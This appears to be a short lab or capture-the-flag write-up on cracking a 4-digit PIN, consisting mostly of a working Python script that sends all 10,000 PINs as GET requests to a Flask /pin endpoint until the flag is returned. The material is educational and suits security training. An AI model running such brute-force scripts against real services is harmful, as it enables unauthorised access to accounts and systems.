PIN CRACKING

this python script is used against a target that generates a random 4-digit PIN and exposes an endpoint (/pin) that accepts a PIN as a query parameter. this Python script systematically iterates all possible 4-digit PINs (0000 to 9999) and sends GET requests to the Flask endpoint with each PIN.

#
root@oco:~$ nano pinSolver.py
import requests

ip = "83.136.251.210"  # Change this to your instance IP address
port = 45104       # Change this to your instance port number

# Try every possible 4-digit PIN (from 0000 to 9999)
for pin in range(10000):
    formatted_pin = f"{pin:04d}"  # Convert the number to a 4-digit string (e.g., 7 becomes "0007")
    print(f"Attempted PIN: {formatted_pin}")

    # Send the request to the server
    response = requests.get(f"http://{ip}:{port}/pin?pin={formatted_pin}")

    # Check if the server responds with success and the flag is found
    if response.ok and 'flag' in response.json():  # .ok means status code is 200 (success)
        print(f"Correct PIN found: {formatted_pin}")
        print(f"Flag: {response.json()['flag']}")
        break
        
root@oco:~$ python3 pinSolver.py
PreviousPASSWORD RESET: SECURITY QUESTIONSNextSESSION TOKENS

Last updated